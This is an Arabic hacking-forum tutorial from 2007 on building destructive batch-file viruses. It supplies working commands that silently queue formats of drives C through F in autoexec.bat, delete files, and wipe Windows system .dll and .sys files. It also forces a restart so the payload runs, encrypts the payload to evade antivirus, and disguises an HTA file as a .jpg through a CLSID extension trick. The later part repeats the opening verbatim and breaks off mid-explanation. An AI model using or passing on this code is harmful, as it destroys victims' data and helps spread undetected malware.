master man
06/09/2007, 08:59 PM
اولاً: تعلم صناعة الفيروسات نوع البات والدودة
انا عارف ان الموضوع طويل بس يا ريت يعجبكم
بسم الله الرحمن الرحيم
ألجزاء الاول
=======
اولاً البرامج المرفقة يمكنك الحصول عليها من على رابط
----------------------------------------------------
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات] ([فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات])
-------------------------------------------------
ان من اشد ما يجذب انتباهى هو ثغرات الاكسبلور والتلغيم وصناعة الفيروسات وتغير الامتداد باستخدام طريقة
CLASID
وطرق خدعها او طريقة عمل الاسكرب او طريقتى
اليوم نتكلم عن ماذا :o
لنختار مثلاً صناعة الفيروسات
اذن هى صناعة الفيروسات
اولاً نذكر طريقة صناعة فيروسات بسيطة من نوع بات وان كان عملها ممتاز جدا جدا
بسم اللة الواجد الماجد موجد كل شىء من لا شىء
اولاً كل الفيروسات الناتجة من هذا تكشف بواسطة مضاد الفيروسات
وقد كان اكتشفت من برنامج نورتون بروفيشينال 2003
وبناء على ذلك توقفت واصيبت بالصدمة
الى ان تمت اعادة بناء المصنع وتقدم الفكرة بعد الى ان توصلت الى
برمجة ادوات مساعدة منها المشفر سولى سيك
والمشفر سولى ساف
وسولى مان وسولى بوى
وكلهم قد جعلا كل فيروسات غير مكشوفة بمضادات الفيروسات ولا احدث نسخة
ولكن المشكلة هى فى الامتداد
فقط ننتج الامتدادات التالية
*.com
*.bat
*.exe
*.pif
وعن قريب يتم نتاج
*.jpg
حيث تم انتاج واحد وهو تحت الاختبار
(ان اطال اللة لنا عمر نذكر كيفية التغير واللعب فى الامتداد بفكرة بسيطة وسوف انقلها لكم عن بحث اسمة
invisible windows extenions
ثم اذكر خدع ابتكرتها بعد تفكير عميق)
الان شرح كيفية عمل فيرس من نوع بات
اولاً تفتح تكست وتضع فية الاتى بالترتيب
(هذا الكود)
---------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
----------------------------------------------
هذا الكود اساسى وبدونة لان تعمل اى شىء وهو المسئول عن كشف الفيرس
من قبل مضادات الفيروسات ولكنة مهم للغاية ولا يتم عمل الفيرس بدونة
ومشكلة كشفة للفيرس انتهت بعملية التشفير
وهو المسئول عن نقل الامر (الذى سوفة نكتبة بعد ذلك) الى ملف اسمة
autoexec.bat
ألموجود فى السى اذا كان الوندوز متصتب عندك على السى وهذا الملف مسئول عن بداية الوندوز بمعنى لو احتوى اى امر فعندما يقوم الوندوز سوف يستدعى هذا الملف وينفذ ما بها من اوامر غريبة او غير غريبة لذلك تعتمد فكرتنا على ادخال امر بداخلة
وهذا الكود ايضاً يظهر الاتواكسك لو كان مخفى ومن ثم ينقل الية الاوامر
الان لعمل امر فورمات نعمل اية ؟
==============================
عاوزين نفرمت دريف
a
اوكية....طب اية هى اوامر الفورمات نحن نعرفها من الدوس
هى كما يالى
ادخل على الدوس واكتب امر فورمات كما ترى
a:/format a then press enter
طب لو فورمات سريع بدون استرجاع البيانات يكون الامر ازى
يكون كما يالى
a:/format a /q /u
اوكية دا كلام مية مية ولكن ازاى اكتب الامر دا على الفيرس
اليك التالى
------------------------------------------------------
echo format a: /q /u /autotest >nul >>c:\autoexec.bat
------------------------------------------------------
هكذا يكون شكل الامر اى اننا زدنا بكلمة
echo & /autotest >nul >>c:\autoexec.bat
ألاولى تعنى انسخ الامر القادم الى (طبعاً معروف من الكود الاول انة الى الاوتواكسك)
الثانية تعنى اجراء وتنفيذ الامر بدون طلب تحذير بتاع
yes and NO
لأانك عارف لما تعمل فورمات لابد ان يحذرك الاول ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية اذن هذا الكود هو المسئول عن هذا ويعنى ايضاً
ان النسخ يكون الى ملف الاوتواكسيك فى السى
ماذا لو عاوز افرمت الدريفات التالية
نكتب اسفل هذا الكود كود فورمات كل دريف على حدا كما يالى |3|
-----------------------------------------------------
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
-----------------------------------------------------
اسمع احدكم الان يقول اذن ايها الاحمق سليمان كيف يكون كود فيرس يقوم بعمل فورمات لكل الدريفات عند الضحية !!
اوكية اليك هذا الكود |2|
-----------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo I hate USA
echo i love shimaa
-----------------------------------------------
نحلل الكود مرة اخرى
call attrib -h -r c:\autoexec.bat >nul
يعنى انة سوف يتم اظهار ملف الاتواكسك وهايتم نقل الاوامر الية
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
يعنى
echo ينسخ الى
format c: /q /u الكود الدوسى وهو لفورمات الدريف سى
- يتجنب رسالة التحذير
>nul >>c:\autoexec.bat أى ان الامر ينسخ الى الاوتواكسك
ملحوظة: ممكن تكرر اى سطر مع تغير اسم الدريف
echo I hate USA
يعنى لو عاوز تعمل كدة كلمة تنهى بها عمل الفيرس وتظهر للضحية فى الاخر
echo i love shimaa
نفس الفكرة اكتب اللى يعجبك
(بالنسبة للاخوة اللى قالو انى عندى صرع عشان كتبت اسم شيماء على برنامجى اقول لهم بالعند فى امثالكم هاكتبها فى اى وقت يعجبنى واكرر شيماء هى ارق انسانة وهى التى اثبتت لى ان الملاك قد يكون انسان هل من معترض واللة انا حر اكتب اللى يعجبك وهو الحكاية ان لو واحد اجنبى وضع صورة اللى بيحبها على برنامجى ما كان واحد فتح فمة ولكن مع عربة كل واحد يفتح فمة من كدة ولا اية)
=======================================
الفصل الثانى من الجزاء الاول
=====================
()()()()()()()()()()()()()()()()()()()
)( تدريــــــــــــــــــــــــــب
()()()()()()()()()()()()()()()()()()()
لو عاوز اكتب كود فيرسى يعمل الاتى
يدخل على دريف الدى عندى الضحية ويقوم بالغاء ملف تكست اسمة مثلاً اكس
(ملحوظة مهمة جدا)
---------------------
يمكنك وضع اى كود دوسى غير الفورمات على هذة القاعدة
---------------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
echo كود دوسى >nul >>c:\autoexec.bat
---------------------------------------------------
والسطر الاخير يكرر ان كنت تريد
اما اذا كانت العملية تتطلب الغاء رسالة تحذيرية فتكون القاعدة
-------------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:\autoexec.bat
------------------------------------------------
مع تكرار السطر الاخير ان تتطلب
ويمكنك وضع قاعدة مشتركة
------------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:\autoexec.bat
echo كود دوسى >nul >>c:\autoexec.bat
-----------------------------------------------
يعنى نفكر كدة انا كان الكود هاعترض رسالة فى احد السطور فلابد من اضافة
/autotest
لتفادى الرسالة التحذيرية
الان نعود الى التدريب
وكان
لو عاوز اكتب كود فيرسى يعمل الاتى
يدخل على دريف الدى عندى الضحية ويقوم بالغاء ملف تكست اسمة مثلاً اكس ؟؟؟؟؟؟؟؟
هل هذة الفكرة تعترضها رسالة تحذيرية
بالطبع لا
اذن اتبع القاعدة الاولى
يكون الكود كما يالى+++++
------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
echo d: >nul >>c:\autoexec.bat
echo Del x.txt >nul >>c:\autoexec.bat
------------------------------------------
التحليل
-------
call attrib -h -r c:\autoexec.bat >nul
ذكرنا انفاً
الان لدخول الدريف دى والغاء ملف اسمة اكس(تكست مثلاً) فى الدوس كنت باتكتب
c:/ press enter
فيتحول المحث الى
d:/
للاغاء هاتكتب
d:/Del x.txt press enter
اذن معنا الكود الدوسى وقد قمنا بالعملية على كام خطوة على خطوتين
اذن معنا الكود وعد الخطوات ومعنا الكود الاساسى للفيرس
نستنتج التالى
عدد سطر الكود لابد ان يكون
اثنين + واحد (اساسى) + اى عدد لو عاوز تكمل الفيرس لشىء تانى
فيكون
call attrib -h -r c:\autoexec.bat >nul
(اساسى)
echo d: >nul >>c:\autoexec.bat
(الدخول على الدريف دى)
echo Del x.txt >nul >>c:\autoexec.bat
(الغاء ملف امسة اكس تكست)
تذكر :::::
echo كود الدوس >nul >>c:\autoexec.bat
()()()()()()()()()()()()()()()()()()()
)( تدريــــــــــــــــــــــــــب
()()()()()()()()()()()()()()()()()()()
لو عاوز تلغى كل ملفات التكست فى الدريف دى يكون الكود
call attrib -h -r c:\autoexec.bat >nul
echo d: >nul >>c:\autoexec.bat
echo Del *.txt >nul >>c:\autoexec.bat
()()()()()()()()()()()()()()()()()()()
)( تدريــــــــــــــــــــــــــب
()()()()()()()()()()()()()()()()()()()
لو عاوز تلغى كل ملفات الزيب فى الدريف دى يكون الكود
call attrib -h -r c:\autoexec.bat >nul
echo d: >nul >>c:\autoexec.bat
echo Del *.zip >nul >>c:\autoexec.bat
ألان تصاب باحباط
بعد تصميم فيرس مثلاً لعمل الفورمات وكتبت الكود فى التكست
يمكنك الان حفظة بامتداد
*.bat
ولنفرض ان الضحية ضغط علية
لن يعمل
لن يعمل
(اسمعك تقول اللة يخرب بيتك يا سليمان بعد كل هذا وتقولى لن يعمل)
هاهاهاها
اخوىت الاعزاء صبراً
فلسوف يعمل لو قام الضحية بعمل ريستارت او طفىء الكمبيوتر ثم اعادة فتحة مجدداً
----------------
ماذا سوف يحدث
----------------
عندما ضغط على الفيرس انتقلت اوامر الدوس الى ملف الاوتواكسك
فلابد من اعادة التشغيل حتى يطلب الوندوز هذا الملف فيجدة وهو على الدوس فاينفذ الاور معتقداً انة يحمل اوامر البدء
-----------------------------------------------------------------
هل يمكن اضافة كود للفيرس بحيث يجعل الكمبيوتر يعمل ريستارت عند الضغط على الفيرس وبالتالى هايعمل
-------------------------------------------------------------------
بالطبع هناك
اضف هذا الكود
c:\windows\rundll.exe user.exe,exitwindowsexec
اذن صمم كود الفيرس
اضف فى السطر الاخير هذا الكود واحفظة الناتج على هيئة امتداد
*.bat
ألان عندما يضغط الضحية علية سوف يحدث وينتقل الاوامر الدوسية ومعها سطر الريستارت وهايحدث ريستارت ويتم تنفيظ الاوامر الدوسية فى سرعة كبير ة جدا اى اننا اجبرنا الضحية على عمل ريستارت لكى يشتغل الفيرس
--------------------------------------------
هل هناك اكواد اخرى مثل عمل اغلاق للوندوز
---------------------------------------------
c:\windows\rundll32.exe user.exe,exitwindows
هذا كود الغلاق
--------------------------------------------------------
الفورمات حرام يعم هل ممكن كود يقرب لعمل الغاء للوندوز
--------------------------------------------------------
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
---------------
تحليلة
---------------
c: دخلنا على السى
cd %WinDir%\System\ دخلنا على ملف السيستم فى الوندوز
deltree /y *.dll الغاء كل ملفات الامتداد دى ال ال والتى يريدها الوندوز
cd\ خرجنا بعد تنفيذ العملية الاولى
deltree /y *.sys ر الغاء كل ملفات السيس فى مسا الوندوز
000000000000000000000000000000
الان معنا فكرة الفيرس وكيفية اجبار الضحية على عمل ريستارت او عمل اغلاق
ولكن لازل الفيرس مكشوف وامتدادة
*.bat
ماذا نحن فاعلون الان
لابد من تغير الامتداد اولاً
ثانياً تشفيرة
ثالثاً تغير امتداد او فكرة لكى يعمل عند الضحية بدون ما يحس سوء بالارسال عبر البريد (ليس على هيئة ملف مرفق بل اكواد مرفقة بتلغيمة)
اول دخولة على صفحة تم تلغيمها
اول تغير الامتداد بشكل تانى
الجزاء الثانى الفصل الثالث
نعود الى المشاكل
----------------
المشكلة الاولى
=========
عندى فيرس او انا صممتة من نوع البات كيف احصل على كود مثل التى سوف تستخدمها وكما تقول وتدعى اية الاحمق فى عمليتين
الاجابة
------
تحول البات الى ما نريد طبقاً للمسار التالى
*.bat------->*.exe-------->*.com-------->*.txt
ولكن للسهولة يمكنك استخدام برنامج
solisek
للتحويل من
*.bat-------->*.com
و من ثم حول الى تكست
وتحصل على الكود
شرح البرنامج
========
ضع ملف البات وليكن اسمة اكس مع البرنامج فى ملف واحد
ادخل على الدوس بنفس الطريقة السابقة
اكتب هذا الامر
solisek.com x.bat
اضغط انتر
اغلاق البرنامج والان تجد ان هناك ملف اسمة
x.com
قد تكون والباقى عليك لتحويلة الى تكست والحصول على الكود المشفر
-----------------------------------------------------
ما الهدف من تحويلة الى كود مشفر مكتوب وهل هناك طريقة اسهل من ذلك للتحويل
----------------------------------------------------
الهدف نذكرة فى اخر المقالة او نقولة فى المقالة القادمة ان لم يسعفنا الوقت
ملحوظة محبطة:
نظراً لفشلى فى الشرح
كنت قد قررنا تحويل الفيروسات الى اكواد مشفر بعد التخلص من امتدادها وتحويلها الى تكست ومن ثم نفك التشفير للحصول على الكود الحقيقى ثم التحويل الى
ASCII
والذى سوف نحتفظ بة ونصنع منة الكثير والكثير
لذلك
قمت ببرمجة برنامج بسيط وسهل جدا جدا بالفجوال بيسيك يقوم بعمل التحويلة بدلاً من البرامج التى قمت بشرحها والتى كتبتها بلغة
*.asm
الاسمبلى
الان شرح البرنامج
-----------------
وهو
SOLI-ASCII.exe
ما ان تفتح البرنامج
يظهر لك خانتين
الخانة الاولى تكتب بها مسار الفيرس باى امتداد
لخانة الاخرى تكتب بها مسار الناتج
مثال
------
انا عندى فيرس اسمة
x.com
اضعة على الدريف
d:/
افتح البرنامج
اكتب فى الخانة العليا
d:/x.com (مسارالفيرس)
اكتب فى الخانة السفلى
d:/virues.txt (مسار التكست الناتج)
الان اضغط على
Done
فتظر لك رسالة
Finished
الان اغلق البرنامج واذهب الى الدريف دى الموجود بة الفيرس
وابحث عن الملف الذى كتبة اسنة لكى يخرج وهو
virues.txt
افتحة فتجد الكود بعد تشفيرة وتحويلة الى
ASCII
التى نريدها
وبالتالى بهذا البرنامج ارحت رؤوساكم بملاين الكلمات والشروح والكثير والحمد اللة
الان اصبح لنا خلفية فى ايجاد كود الفيرس بشكل
ASCII
ماذا نحن فاعلون
لابد لنا من اصابة الهدف ولكن بعدة حيل
التشفير ايها المغفل اين هو
-------------------------
يا شباب الكثير يختلط علية الاحمر بين تشفير وضغط لذلك وعد منى فى احد المقالت ان اكتب عن التشفير ويا سيدى
افهم الفيروسات الاول وبعدين افهم التشفير وشفر الفيرس ثم حولة الى
ASCII
وبعدين طبق بة الحيل
اولاً
----
معنا فيرس تم تحويلة الى اكواد
ASCII
ماذا نفعل
0لابد ان تكون مختار من الاعلى
view
foldder options
view
وشايل العلمة من على
hide extenions
وذلك لكى يظهر الامتداد
1- الحيلة الاولى
----------------
الفكرة : نضع الكود فى تكست ونحول امتدادة الى بعد ما نغير بة ما يلازم
*.HTA
وليكن
x.hta
ثم نقوم بعملية اعادة الاسم الى
x.jpg
الان تغير امتدادة وبالتالى لم يكن فعال
اوكية عادى
نعمل اعادة تسمية اخرى الى
x.jpg.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
وهذا الـــ
{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
يسمى بالـــ
CLASID
وهو الخاص لنوع
*.HTA
فتجد
الان الاسم تحول الى
x.jpg
فقط واختفى الكود المضافة وذلك لنة من نوع
invisible windows extentions
وتغيرت الايقونة
الان عند ملف اسمة
x.jpg
والامتداد هو
jpg
يمكنك تغير الايقونة
(مرفق ايقونة مع المرفقات)
باستخدام برنامج مثل الميكروايقون او هانك طريقة اخرى لا يسعنى الوقت لذكرها
بعد تغير الايقونة
اضغط على البرنامج
تجد ان انفتح ملف من نوع
*.hta
مشاكل
--------
بعد الاصابة ونحن نعلم ان نوع هذا الملف يحتاج الى عمل ريستارت لكى يعمل فماذا نفعل
ما هو التغير الذى يلازم تكوين هذا الملف
ما هى الحيل الاخرى
ماذا لو شك الضحية خصوصاً انة لم تظهر صورة لة
هل هناك حيل اخرى
(اكيد فالماذا اطلق على هذة حيلة اولى)
هل يمكنك شرح الطريقة بالتفصيل اكثر
(بالتاكيد لانى قلت هذة الفكرة اذن لابد من تفعيل هذة الفكرة)
هل يمكن ان تشرح فكرة الاسكرب
(اعتقج انها فكرة سخيفة ولكنى سوف اشرحها خصوصاً ان هناك احد الاعضاء مبرمج محترف كتب فى احد المنتديات الاجنبية التى يتسكع بها دائماً انة يستحل تغير ايقونة الاسكرب ولكنى سوف اغيرها )
كل هذا واكثر فى المقالة القادمة
واكرر اسفى ان كنت قصرت فى الشرح وقريباً ان شاء اللة مقالة مفصلة وكبيرة نوعاً ما
عد المقالات فى صناعة الفيورسات من نوع بات والدودة
اربعة او خمسة مقالات
بعد ان كتب لنا عمر ننتقل الى تعلم صناعة الفيروسات باستخدام الفجوال بيسيك وان كانت فكرتة سخيفة الى حداً ما
1- كيفية وضع كود فورمات او اى كود دوس فى صفحة انترنت (ندخل فى تفاصيلها اليوم)
2- كيفية الحصةل على كود اى افيرس وذلك بتحويل الامتدادات باستخدام برامجى ارفقتها مع المرفقات
exe ---> com ---> txt
bat ---> txt
3- شرحت برنامج من تصميم العبد للة والحمد اللة الواجد الماجد يقوم بتحويل اى فيرس ذو اى امتداد الى اكواد تضع فى تكتست من نوع
ASCII
4 - شرحت فكرة حيلة
CLASID
( نسترسل بها اليوم ان شاء اللة)
بسم اللة الرحمن الرحيم اولاً واخيراً
====================
نشرح التشفير + ادخل الفيرس البات الى صفحة انترنت + خدع الامتدادات
اولاً
===
التشفير
--------
قبل ما نبداء نسمى مع بعض كدة باسم الواجد الماجد موجد كل شىء ونقول يا هادى يارب
بما اننا نتكلم عن الفيروسات وليس التروجن او اى شىء اخر ان لابد ان اتحدث واصيبكم بالصداع عن تشفير الفيروسات واليوم نحن بصدد فيروسات البات اى الان معك الكود (شرحنا اما تصمم انت الكود او تحصل علية من فيرس كان عندك من قبل باستخدام براكجى للتحويل حتى تصل الى الامتداد التكست وتحصل على الكود)
اكرر الان اما ان تصمم الكود او تحصل علية
بعد الحصول علية
افتح برنامجى المرفق واسمة
soliboy.exe
فتظهر لك شاشة تجد بها عدة ازرار على اليمين وعلى اليسار ثلاث خانات كبيرة
تعمل كوبى للكود الفيرسى وتضع الكود فى الخانة الثانية (الخانة التى فى المنتصف)
الان اضغط على زر
understand
فتظر اشياء فى الخانة الاولى العليا (اتركها ولا يهمك)
الان اضغط على زر
Soli-bat
فيظهر كود بالاسفل فى الخانة السفلى وهو المراد
انسخة وضعة فى ملف تكست ثم احفظ الملف على امتداد
*.bat
----------------------------------------------------------------------
سؤال الى الاخ الاحمق سليمان هكذا يقول احدكم انت الان لم تحدد اى كود
-----------------------------------------------------------------------
اولاً
---
اذا كنت مصمم كود فيرس بات يمكنك تشفيرة باتباع الطريقة السابقة
ثانياً
-----
ان كنت حصل على كود الفيرس من احد الفيروسات التى كانت موجود من قبل على امتداد
*.exe
اذن حول الامتداد حسب ما ذكرتة فى المقالة الثالثة وكما يشير المخطط
exe--------->com-------->txt
bat------->txt
احصل على الكود ثم شفرة وضعة فى التكست واعد تسميتة الى امتداد
bat
=====================================
الان الفيرس تم تشفيرة ولا يكتشف من قبل مضادات الفيروسات
يمكنك الوقوف هنا وتكتفى بذلك
=====================================
-------------------------------------------------------------------
سؤال لماذا لا نستخدم مباشرة احد برامج التشفير والتى نسمع عنها :-
-------------------------------------------------------------------
شرح فكرة التشفير التى انخدع بها الكثير منهم محسوبكم
اولاً ايها السادة البرمج التى كثيراً ما نسمع عنها واقصد معظمها حتى لا يزعل احد تعتمد على ما يسمى
internal exe compressor
او الضغط الداخلى فمثلاً برامج لو احضرت سرفر وقمت بضغطة بالوين زيب وشغل النورنوت وجعلتة اوتو بروتكت بالتاكيد لان يراة الا لو قمت بعمل اسكان علية
هذا النوع يسمى
external copressor
اى الضغط الخارجى
ماذا لو فعلنا الضغط الداخلى مثل معظم البرامج تعمل ونقول عليها بتشفير
هنا لو كان النورتون اوتو بروتكت لان يلاحظة مثلة مثل الضغط الخارجى ولكن يفرق عنة لو انكن عملت لة اسكان ايضاً لن ينكشف
ماذا لو ضغط علية
@
هنا نورتون يكشفة بالرغم من انك قد عملت لة اسمان ولم يكشفة
لانك عندما تضغط علية يحدث
de-internal compressor
او بمعنى اخر عشان ما يتفزلك علينا واحد اجنبى يمكن قولها
internal de-compressor
ونتعنى عند الضغط يحدث فك الضغط الداخلى وهو طبيعى لكى يعمل السرفر وهنا لان نورتون اوتو بروتكت هايكشف اللعبة
اكرر انة هذا خطاء جسيم وقع معظمنا بة حتى انا فى البداية وقعت بة
ارسل السرفر وهوب اجدة لا يعمل (بالطبع لان الضحية كان مشغل نورتون وعامل اوتوبروتكت)
لذلك لجاء الناس السوبر الى تشفير الكود التى تم برمجتة البرنامج بة
وعشان كدة تجد ان هناك برامج اختراق لا تحتاج الى تشفير انما تحتاج الى ضغط فقط وايضاً تجد سرفرات قتل مضادات الفيروسات لا تحتاج الى تشفير وذلك لان المصممة قد شفرة كودى يطلق عليها بالانجليزى
internal codic Encrypt
لذلك فكر محسوبكم العبد الفقير ان يبرمج برنامج بسيط وسهل لتشفير الفيروسات من نوع البات او التى تم تحويلها الى البات (ذكرنا التحويل فى المقالة الثانية ابوس يدك راجعها وحاول ان تفهم من مغفل مثلى لان شرحها قمة نعم قمة فى الردائة والسوء)
وهذا البرنامج شرحتة فى الاعلى
(بالنسبة لتشفير الباتش ان شاء اللة اضع برنامج من تصميم العبد الفقير وكويس الى حداً ما ويكون واحد يعنى اهوة شىء عربى اصيل ولكن واللة الى ماخرة انى ما بحب اكتب فى كذا موضوع واحنا النهاردة فى الفيروسات وكمان ما عملت لة كمبيل يعنى حولتة الى ملف تنفيذى ان شاء ان كتب لنا عمر يكون قريبا قريبا جدا)
ثالثاً
-----
فى كلتا الحالتين تحول الى بات
حولة باستخدام برنامجى الذى ارفقتة فى المقالة السابقة
SOLI-ASCII.exe
الى اكواد
احتفظ بها والان ننتقل الى الجزاء التانى اى اننا
صممنا الكود او حصلنا علية + تم تشفير الكود وتحويلة الى بات + تم تحويلة الى اكواد من نواع اية اس سى اى اى
الجزاء الثانى وهو ادخال هذا الفيرس على صفحة انترنت
------------------------------------------------------
الكود الان بين يدنا مشفر ومتحول الى ارقام وكلام فارغ لوضعة بصفحة انترنت
انا عارف ان الموضوع طويل بس يا ريت يعجبكم
بسم الله الرحمن الرحيم
ألجزاء الاول
=======
اولاً البرامج المرفقة يمكنك الحصول عليها من على رابط
----------------------------------------------------
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات] ([فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات])
-------------------------------------------------
ان من اشد ما يجذب انتباهى هو ثغرات الاكسبلور والتلغيم وصناعة الفيروسات وتغير الامتداد باستخدام طريقة
CLASID
وطرق خدعها او طريقة عمل الاسكرب او طريقتى
اليوم نتكلم عن ماذا :o
لنختار مثلاً صناعة الفيروسات
اذن هى صناعة الفيروسات
اولاً نذكر طريقة صناعة فيروسات بسيطة من نوع بات وان كان عملها ممتاز جدا جدا
بسم اللة الواجد الماجد موجد كل شىء من لا شىء
اولاً كل الفيروسات الناتجة من هذا تكشف بواسطة مضاد الفيروسات
وقد كان اكتشفت من برنامج نورتون بروفيشينال 2003
وبناء على ذلك توقفت واصيبت بالصدمة
الى ان تمت اعادة بناء المصنع وتقدم الفكرة بعد الى ان توصلت الى
برمجة ادوات مساعدة منها المشفر سولى سيك
والمشفر سولى ساف
وسولى مان وسولى بوى
وكلهم قد جعلا كل فيروسات غير مكشوفة بمضادات الفيروسات ولا احدث نسخة
ولكن المشكلة هى فى الامتداد
فقط ننتج الامتدادات التالية
*.com
*.bat
*.exe
*.pif
وعن قريب يتم نتاج
*.jpg
حيث تم انتاج واحد وهو تحت الاختبار
(ان اطال اللة لنا عمر نذكر كيفية التغير واللعب فى الامتداد بفكرة بسيطة وسوف انقلها لكم عن بحث اسمة
invisible windows extenions
ثم اذكر خدع ابتكرتها بعد تفكير عميق)
الان شرح كيفية عمل فيرس من نوع بات
اولاً تفتح تكست وتضع فية الاتى بالترتيب
(هذا الكود)
---------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
----------------------------------------------
هذا الكود اساسى وبدونة لان تعمل اى شىء وهو المسئول عن كشف الفيرس
من قبل مضادات الفيروسات ولكنة مهم للغاية ولا يتم عمل الفيرس بدونة
ومشكلة كشفة للفيرس انتهت بعملية التشفير
وهو المسئول عن نقل الامر (الذى سوفة نكتبة بعد ذلك) الى ملف اسمة
autoexec.bat
ألموجود فى السى اذا كان الوندوز متصتب عندك على السى وهذا الملف مسئول عن بداية الوندوز بمعنى لو احتوى اى امر فعندما يقوم الوندوز سوف يستدعى هذا الملف وينفذ ما بها من اوامر غريبة او غير غريبة لذلك تعتمد فكرتنا على ادخال امر بداخلة
وهذا الكود ايضاً يظهر الاتواكسك لو كان مخفى ومن ثم ينقل الية الاوامر
الان لعمل امر فورمات نعمل اية ؟
==============================
عاوزين نفرمت دريف
a
اوكية....طب اية هى اوامر الفورمات نحن نعرفها من الدوس
هى كما يالى
ادخل على الدوس واكتب امر فورمات كما ترى
a:/format a then press enter
طب لو فورمات سريع بدون استرجاع البيانات يكون الامر ازى
يكون كما يالى
a:/format a /q /u
اوكية دا كلام مية مية ولكن ازاى اكتب الامر دا على الفيرس
اليك التالى
------------------------------------------------------
echo format a: /q /u /autotest >nul >>c:\autoexec.bat
------------------------------------------------------
هكذا يكون شكل الامر اى اننا زدنا بكلمة
echo & /autotest >nul >>c:\autoexec.bat
ألاولى تعنى انسخ الامر القادم الى (طبعاً معروف من الكود الاول انة الى الاوتواكسك)
الثانية تعنى اجراء وتنفيذ الامر بدون طلب تحذير بتاع
yes and NO
لأانك عارف لما تعمل فورمات لابد ان يحذرك الاول ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية اذن هذا الكود هو المسئول عن هذا ويعنى ايضاً
ان النسخ يكون الى ملف الاوتواكسيك فى السى
ماذا لو عاوز افرمت الدريفات التالية
نكتب اسفل هذا الكود كود فورمات كل دريف على حدا كما يالى |3|
-----------------------------------------------------
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
-----------------------------------------------------
اسمع احدكم الان يقول اذن ايها الاحمق سليمان كيف يكون كود فيرس يقوم بعمل فورمات لكل الدريفات عند الضحية !!
اوكية اليك هذا الكود |2|
-----------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo I hate USA
echo i love shimaa
-----------------------------------------------
نحلل الكود مرة اخرى
call attrib -h -r c:\autoexec.bat >nul
يعنى انة سوف يتم اظهار ملف الاتواكسك وهايتم نقل الاوامر الية
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
يعنى
echo ينسخ الى
format c: /q /u الكود الدوسى وهو لفورمات الدريف سى
- يتجنب رسالة التحذير
>nul >>c:\autoexec.bat أى ان الامر ينسخ الى الاوتواكسك
ملحوظة: ممكن تكرر اى سطر مع تغير اسم الدريف
echo I hate USA
يعنى لو عاوز تعمل كدة كلمة تنهى بها عمل الفيرس وتظهر للضحية فى الاخر
echo i love shimaa
نفس الفكرة اكتب اللى يعجبك
(بالنسبة للاخوة اللى قالو انى عندى صرع عشان كتبت اسم شيماء على برنامجى اقول لهم بالعند فى امثالكم هاكتبها فى اى وقت يعجبنى واكرر شيماء هى ارق انسانة وهى التى اثبتت لى ان الملاك قد يكون انسان هل من معترض واللة انا حر اكتب اللى يعجبك وهو الحكاية ان لو واحد اجنبى وضع صورة اللى بيحبها على برنامجى ما كان واحد فتح فمة ولكن مع عربة كل واحد يفتح فمة من كدة ولا اية)
=======================================
الفصل الثانى من الجزاء الاول
=====================
()()()()()()()()()()()()()()()()()()()
)( تدريــــــــــــــــــــــــــب
()()()()()()()()()()()()()()()()()()()
لو عاوز اكتب كود فيرسى يعمل الاتى
يدخل على دريف الدى عندى الضحية ويقوم بالغاء ملف تكست اسمة مثلاً اكس
(ملحوظة مهمة جدا)
---------------------
يمكنك وضع اى كود دوسى غير الفورمات على هذة القاعدة
---------------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
echo كود دوسى >nul >>c:\autoexec.bat
---------------------------------------------------
والسطر الاخير يكرر ان كنت تريد
اما اذا كانت العملية تتطلب الغاء رسالة تحذيرية فتكون القاعدة
-------------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:\autoexec.bat
------------------------------------------------
مع تكرار السطر الاخير ان تتطلب
ويمكنك وضع قاعدة مشتركة
------------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:\autoexec.bat
echo كود دوسى >nul >>c:\autoexec.bat
-----------------------------------------------
يعنى نفكر كدة انا كان الكود هاعترض رسالة فى احد السطور فلابد من اضافة
/autotest
لتفادى الرسالة التحذيرية
الان نعود الى التدريب
وكان
لو عاوز اكتب كود فيرسى يعمل الاتى
يدخل على دريف الدى عندى الضحية ويقوم بالغاء ملف تكست اسمة مثلاً اكس ؟؟؟؟؟؟؟؟
هل هذة الفكرة تعترضها رسالة تحذيرية
بالطبع لا
اذن اتبع القاعدة الاولى
يكون الكود كما يالى+++++
------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
echo d: >nul >>c:\autoexec.bat
echo Del x.txt >nul >>c:\autoexec.bat
------------------------------------------
التحليل
-------
call attrib -h -r c:\autoexec.bat >nul
